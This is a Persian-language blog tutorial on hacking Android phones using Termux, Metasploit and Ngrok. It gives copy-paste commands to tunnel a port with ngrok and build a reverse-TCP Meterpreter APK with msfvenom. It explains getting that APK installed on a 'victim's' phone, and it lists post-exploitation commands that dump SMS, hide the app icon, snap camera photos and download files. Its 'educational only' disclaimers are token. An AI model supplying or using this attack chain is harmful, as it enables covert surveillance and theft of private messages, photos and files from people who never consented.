گام به گام آموزش شروع کار با ابزار ترموکس برای هک گوشی‌های اندروید

هک گوشی اندروید با استفاده از ترموکس با متاسپلویت و Ngrok از موضوعات پیچیده اما جذاب در دنیای امنیت سایبری است. در این مقاله، ما به طور دقیق و جامع به شما نشان خواهیم داد که چگونه از ابزارهایی مانند ترموکس، متاسپلویت و انگروک (Ngrok) برای هک گوشی اندروید استفاده کنید. اگر شما به دنبال یادگیری مهارت های امنیتی در زمینه تلفن همراه هستید، اینجا بهترین منبع برای شماست.

بیشتر بخوانید: معرفی ۲۰ برنامه هک گوشی اندرویدی

مقدمه: دستیابی به مهارت هک گوشی اندروید

در دنیای امروز، تلفن همراه به یکی از ابزارهای اصلی ما برای ارتباطات، کارهای روزمره و تفریح تبدیل شده است. اما به دلیل پیچیدگی های تکنولوژی و مسائل امنیتی، یادگیری مفاهیم امنیت سایبری برای حفاظت از اطلاعات مهم در تلفن همراه ضروری است.

هک گوشی اندروید با استفاده از ترموکس با متاسپلویت و Ngrok: چرا این مهارت مهم است؟

در دنیای امروز، تلفن همراه دارای اطلاعات حساسی است که ممکن است در معرض خطر قرار گیرند. از جمله اطلاعات شخصی، پیام ها، عکس ها و حتی اطلاعات بانکی. این مقاله به شما یاد خواهد داد که چگونه با استفاده از ترموکس، متاسپلویت و انگروک(Ngrok) به عنوان ابزارهای قدرتمند، گوشی اندروید را امن نگه داشته و از تهدیدهای امنیتی محافظت کنید.

مرحله به مرحله: راهنمای هک گوشی اندروید

نصب و راه‌اندازی ترموکس و ابزارهای موردنیاز

برای شروع، باید ترموکس و ابزارهای مورد نیاز را روی دستگاه خود نصب کنید. این ابزارها به شما امکان اجرای دستورات هک را خواهند داد. در اینجا لیستی از ابزارهای لازم برای شروع به کار داریم:

• ترموکس: ابزار کلیدی برای اجرای دستورات هک.
• متاسپلویت: برای آزمایش آسیب‌پذیری‌ها و اجرای اسکریپت‌های مخرب.
• Ngrok: جهت بررسی امنیت و تست نفوذ به سیستم.

با نصب این ابزارها، ابتداگاهی قوی در دنیای هک گوشی اندروید به دست می‌آورید.

راهنمای هک گوشی اندروید با استفاده از ترموکس و متاسپلویت

در این پست، قصد داریم یاد بگیریم چگونه از طریق ترموکس با متاسپلویت گوشی های اندروید را هک کنیم. شما می‌توانید دستورات را یکی یکی در اپلیکیشن ترموکس کپی و پیست کنید و آنها به درستی کار خواهند کرد.

توجه: این پست تنها برای اهداف آموزشی است. من و این سایت هیچگونه فعالیت جنایی را پشتیبانی نمی‌کنیم. اگر از اطلاعات این پست به نحوه‌ای سوءاستفاده می‌کنید، این سایت مسئولیتی ندارد. این سایت تنها هک اخلاقی را پشتیبانی می‌کند.

نیازمندی‌ها:

ترموکس: اگر می‌خواهید در مورد ترموکس بیشتر بدانید [ترموکس چیست؟ – دانلود ترموکس]
متاسپلویت: اگر متاسپلویت را در ترموکس خود ندارید [نصب متاسپلویت در ترموکس]

تست آسیب‌ پذیری‌ها و شناسایی نقاط ضعف گوشی اندویدی

با استفاده از متاسپلویت و انگروک، می‌توانید تست آسیب‌پذیری‌ها و نقاط ضعف موجود در گوشی اندروید هدف انجام دهید. با این کار، به طور دقیق از امنیت گوشی مورد نظر آگاهی پیدا می‌کنید و می‌توانید تدابیر لازم را برای محافظت از آن اتخاذ کنید.

اجرای دستورات هک با استفاده از ترموکس

ترموکس به شما امکان اجرای دستورات متنوعی را روی دستگاه هدف می‌دهد. از اسکن شبکه تا نفوذ به سیستم، از ترموکس برای انجام عملیات هکی مختلف استفاده می‌شود. این ابزار با ارائه محیط خط فرمان، به شما امکان تعامل با سیستم را می‌دهد و دستورات مختلفی را برای تست و بررسی اجرا می‌کند.

ویژگی‌های برنامه ترموکس (Termux)

ترموکس یک برنامه قدرتمند است که امکان دسترسی به محیط خط فرمان لینوکسی را در دستگاه‌های اندرویدی فراهم می‌کند. این برنامه دارای ویژگی‌های بی‌نظیری است که به شما اجازه می‌دهد از ابزارهای هک و تست نفوذ بر روی دستگاه‌های اندرویدی خود استفاده کنید. در این بخش، به برخی از ویژگی‌های مهم ترموکس پرداخته خواهد شد.

1. محیط خط فرمان لینوکسی

ترموکس به شما محیطی مشابه با محیط خط فرمان لینوکسی ارائه می‌دهد. این به شما امکان می‌دهد دستورات لینوکسی را در دستگاه اندرویدی خود اجرا کنید و به عنوان یک توسعه‌دهنده یا تخصصی در زمینه امنیت سایبری فعالیت کنید.

2. نصب ابزارهای مختلف

با استفاده از ترموکس، می‌توانید ابزارهای مختلفی را روی دستگاه اندرویدی خود نصب کنید. از ابزارهای هک تا ابزارهای توسعه نرم‌افزار، همه در اختیار شما خواهند بود.

3. اجرای اسکریپت‌ها و دستورات

شما می‌توانید اسکریپت‌ها و دستورات خود را از طریق ترموکس اجرا کنید. این ویژگی برای تست نفوذ و بررسی امنیت سیستم‌ها بسیار مفید است.

4. پشتیبانی از پکیج‌های APT

ترموکس از مدیریت پکیج‌های APT پشتیبانی می‌کند. این به شما امکان می‌دهد پکیج‌های مورد نیاز خود را با استفاده از ابزار مدیریت پکیج‌های APT نصب، به‌روزرسانی و حذف کنید.

5. استفاده از ترموکس بدون نیاز به دسترسی روت

برخلاف بسیاری از برنامه‌های مشابه، ترموکس نیازی به دسترسی روت بر روی دستگاه شما ندارد. این به معنای این است که می‌توانید از این برنامه بر روی دستگاه اندرویدی خود استفاده کنید بدون اینکه به دسترسی‌های سیستمی عمیقی نیاز داشته باشید.

6. پشتیبانی از اسکریپت‌های Shell

ترموکس به شما اجازه می‌دهد اسکریپت‌های Shell خود را اجرا کنید. این ویژگی به شما امکان می‌دهد از اسکریپت‌های خود برای انجام عملیات مختلف استفاده کنید.

7. اتصال به سرورها و دستگاه‌های دیگر

با استفاده از ترموکس، می‌توانید به سرورها و دستگاه‌های دیگر از طریق SSH، Telnet و …

پورت فوروارد با استفاده از انگروک در ترموکس:

اگر می‌خواهید از متاسپلویت در شبکه محلی استفاده کنید، می‌توانید این مرحله را رد کنید (اگر شما و قربانی‌تان به همان وای‌فای متصل هستید، می‌توانید این مرحله را رد کنید).

با کمک پورت فوروارد، می‌توانیم به گوشی قربانی دسترسی پیدا کنیم، از طریق داده‌های موبایلی، به این معنی که اگر از سیم‌کارت استفاده می‌کنید، باید پورت فوروارد را برای استفاده از متاسپلویت انجام دهید.

مرحله 1: به سایت Ngrok.com بروید و یک حساب کاربری ایجاد کنید. اگر از قبل حسابی در ngrok دارید، وارد شوید.

مرحله 2: فایل فشرده Ngrok را روی گوشی خود دانلود کنید. اندازه این فایل تقریباً 12 مگابایت خواهد بود.

مرحله 3: اکنون یک فایل فشرده خواهید دید که از وب‌ سایت Ngrok دانلود کرده‌اید.

ترموکس را باز کرده و به آن فایل فشرده رفته و در صورتی که در پوشه دانلود شما نیست یا نمی‌توانید پوشه دانلود خود را ببینید، فقط مدیر فایل را باز کرده و فایل زیپ را در حافظه داخلی خود جای‌گذاری کنید و به ترموکس بروید و cd storage را وارد کنید.

مرحله 4: این دستور را تایپ کنید تا فایل زیپ را در دایرکتوری خانگی ترموکس خود کپی کنید.

cp ngrok-stable-linux-arm.zip /$HOME

مرحله 5: این دستور را تایپ کنید تا به دایرکتوری خانگی خود بازگردید.

cd /$HOME

مرحله 6: این دستور را تایپ کنید تا فایل را از حالت فشرده خارج کنید.

unzip ngrok-stable-linux-arm.zip

مرحله 7: دوباره به سایت Ngrok بروید و توکن را کپی کنید (لطفاً توکن کامل را کپی کنید)

مرحله 8: ترمینال را باز کنید و این کد را تایپ کنید و توکن خود را جای‌گذاری کنید و دکمه Enter را بزنید.

./ngrok authtoken

مرحله 9: این دستور را تایپ کنید تا شروع به فوروارد پورت در پورت 1275 کنید.

./ngrok tcp 1275

شما می‌توانید هر شماره‌ی پورتی را که می‌خواهید استفاده کنید، اینجا من از شماره‌ی 1275 استفاده می‌کنم.

مرحله 10: اگر شما هم به این خطا برخورد می‌کنید، کافیست هات‌اسپات خود را باز کنید و این مشکل ظرف 30 تا 60 ثانیه حل می‌شود.

ایجاد پیلود در متاسپلویت:

پیلود یک فایل apk خواهد بود که قصد داریم آن را در گوشی قربانی نصب کنیم. این به ما امکان می‌دهد که به گوشی اندرویدی قربانی دسترسی پیدا کنیم.

مرحله 1: یک نشست جدید در ترموکس باز کنید (صفحه‌ی خود را از چپ به راست بکشید و بر روی نشست جدید کلیک کنید). لطفاً مطمئن شوید که ترموکس دسترسی به حافظه را دارد. اگر دسترسی به حافظه را ندارید، دستورات زیر را تایپ کنید.

termux-setup-storage

دسترسی به حافظه را برای ترموکس اجازه دهید.

مرحله 2: این دستور را تایپ کنید تا یک پیلود ایجاد کنید و دکمه Enter را بزنید.

لطفاً LHOST و LPORT خود را با توجه به تصویر زیر تغییر دهید.

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk

مرحله 3: به حافظه داخلی خود بروید و فایل Android.apk را خواهید دید.

این فایل apk را در گوشی قربانی نصب کنید.

شروع کننده (Msfconsole):

مرحله 1: این دستور را در پنجره ترموکس برای شروع msfconsole تایپ کنید.

msfconsole

ممکن است تا 30 ثانیه طول بکشد تا آغاز شود.

مرحله 2: این دستور را تایپ کنید تا Multi handler در Metasploit را آغاز کنید.

use exploit/multi/handler

مرحله 3: این دستور را تایپ کنید تا پیلود را تنظیم کنید.

set payload android/meterpreter/reverse_tcp

مرحله 4: حالا LHOST را تنظیم کنید که می‌خواهید به جلسه گوش دهید.
اگر از فوروارد پورت Ngrok استفاده می‌کنید، این آدرس IP را وارد کنید، اما اگر از فوروارد پورت استفاده نمی‌کنید، آی‌پی محلی خود را وارد کنید.

set LHOST 127.0.0.1

مرحله 5: حالا LPORT را تنظیم کنید.
اگر از Ngrok استفاده می‌کنید، همان پورتی را که در هنگام فوروارد پورت استفاده کرده‌اید تنظیم کنید.

اگر از فوروارد پورت استفاده نمی‌کنید، فقط پورت مشابهی که برای ایجاد پیلود استفاده کرده‌اید، وارد کنید.

set LPORT 1275

مرحله 6: این آخرین دستور است و گوشی هک می‌شود.

exploit.

به قربانی متصل می‌شود و جلسه meterpreter را به شما ارائه می‌دهد.

[ساخت apk Payload خود را بی‌شناس در مقابل امنیت گوگل پلی استور کنید]

نصب APK ترموکس در گوشی هدف

پس از ایجاد برنامه هک با استفاده از ترموکس (Termux)، شما ممکن است نیاز داشته باشید این برنامه را در دستگاه اندرویدی قربانی نصب کنید. در این مرحله، باید فایل Android.apk را به دستگاه اندرویدی قربانی منتقل کنید و سپس آن را نصب نمایید. در ادامه به توضیح مراحل این عملیات خواهیم پرداخت.

1. انتقال فایل APK به دستگاه هدف

برای انتقال فایل Android.apk به دستگاه اندرویدی قربانی، می‌توانید از روش‌های مختلفی مانند بلوتوث، ایمیل، پیامک یا حتی کابل USB استفاده کنید. مطمئن شوید که فایل به صورت امن و بدون تغییر در دستگاه قرار می‌گیرد.

2. نصب فایل APK

پس از انتقال فایل APK به دستگاه، باید اقدام به نصب آن کنید. برای این کار مراحل زیر را دنبال کنید:

• روی فایل Android.apk که در دستگاه قربانی ذخیره شده است، کلیک کنید.
• دستگاه اندرویدی قربانی نسبت به نصب برنامه هشدار خواهد داد. روی گزینه “نصب” کلیک کنید.

3. اجرای برنامه ترموکس

پس از نصب موفقیت‌آمیز برنامه Android.apk، می‌توانید اقدام به اجرای آن کنید. مطمئن شوید که دستگاه قربانی از اتصال اینترنتی فعال برخوردار است تا برنامه به درستی کار کند.

توجه: احترازهای امنیتی

استفاده از ابزارهایی مانند Android.apk به منظور نصب برنامه‌ها بر روی دستگاه‌های دیگر بدون اجازه آنها می‌تواند نقض امنیت و حریم خصوصی باشد. تا حد امکان، از انجام این کارها خودداری کنید و همیشه احتیاط لازم را به عمل آورید.

چند دستور مفید در Meterpreter.

یافتن تمام دستورات موجود:

این دستور لیستی از دستورات و توضیحات کوتاهی از آن دستورات را به شما می‌دهد.

help

دریافت پیام‌های کوتاه از گوشی قربانی به تلفن شما:

این دستور پنجاه پیام مهم‌ترین پیام‌های کوتاه را از گوشی قربانی به شما می‌دهد.

dump_sms

شما یک فایل متنی دریافت خواهید کرد که تمام پیام‌های کوتاه با جزئیات را در خود دارد، فقط از دستور cat برای باز کردن فایل استفاده کنید.

مخفی کردن نماد اپلیکیشن ارسالی به قربانی:

اگر شما دارید یک اپلیکیشن را روی گوشی قربانی نصب می‌کنید، طبیعی است که قربانی متوجه شود و احتمالاً این اپلیکیشن را حذف خواهد کرد. با استفاده از دستور زیر می‌توانید نماد اپلیکیشن را از گوشی قربانی مخفی کنید.

hide_app_icon

تغییر حالت صدای گوشی قربانی:

شما می‌توانید با استفاده از دستور زیر گوشی را در حالت عمومی قرار دهید.

set_audio_mode -m 1

شما می‌توانید set_audio_mode -m 0 را تایپ کنید تا گوشی را ساکت کنید.

گرفتن تصاویر از دوربین گوشی قربانی:

این دستور یک عکس از دوربین گوشی قربانی گرفته و آن را به پوشه ذخیره شما ارسال می‌کند.

webcam_snap

دسترسی به فضای ذخیره‌سازی فایل‌های قربانی:

شما می‌توانید به پوشه‌ها و فایل‌های قربانی دسترسی پیدا کنید و تمام داده‌ها را مشاهده کنید.

cd /sdcard

شما می‌توانید دستور ls را تایپ کنید تا فهرست پوشه‌ها نمایش داده شود. اگر می‌خواهید در مورد دستورات پایه ترموکس بیشتر بدانید، این پست را مطالعه کنید.

دانلود هر فایل از گوشی قربانی:

به مسیر فایلی که می‌خواهید دانلود کنید بروید و این دستور را تایپ کنید.

 download file-name

نتیجه گیری:

حالا شما دارای یک جلسه meterpreter هستید، که به معنای دسترسی به گوشی قربانی است. اما اگر قربانی اپلیکیشن را حذف کرد، نمی‌توانید دسترسی به گوشی را داشته باشید. اگر می‌خواهید بدانید چگونه می‌توانیم حتی اگر قربانی گوشی را راه‌اندازی مجدد کند، به گوشی دسترسی داشته باشیم، به این [چگونگی مخفی کردن نماد اپلیکیشن و ایجاد پیلود ماندگار در متاسپلویت] مراجعه کنید. اگر سوالی دارید، می‌توانید در نظرات از من بپرسید. با تشکر از خواندن و همیشه اخلاقی بمانید👾.

پرسش‌های متداول در مورد هک تلفن اندروید

آیا برای یادگیری هک حتماً نیاز به پیش‌زمینه تخصصی دارم؟

خیر، برای شروع یادگیری هک تلفن اندروید، نیاز به پیش‌زمینه تخصصی خاصی ندارید. با مطالعه و تمرین منظم، می‌توانید از مبتدی به متخصص پیشرفت کنید.

آیا هک تلفن اندروید من را در معرض خطر قرار می‌دهد؟

هک تلفن اندروید به درستی انجام شده و بدون اخذ مجوز معمولاً مشکلات امنیتی بوجود می‌آورد. بهترین راه برای جلوگیری از مشکلات امنیتی این است که از اطلاعات امنیتی در حفظ و به روزرسانی تلفن همراه خود مراقبت کنید.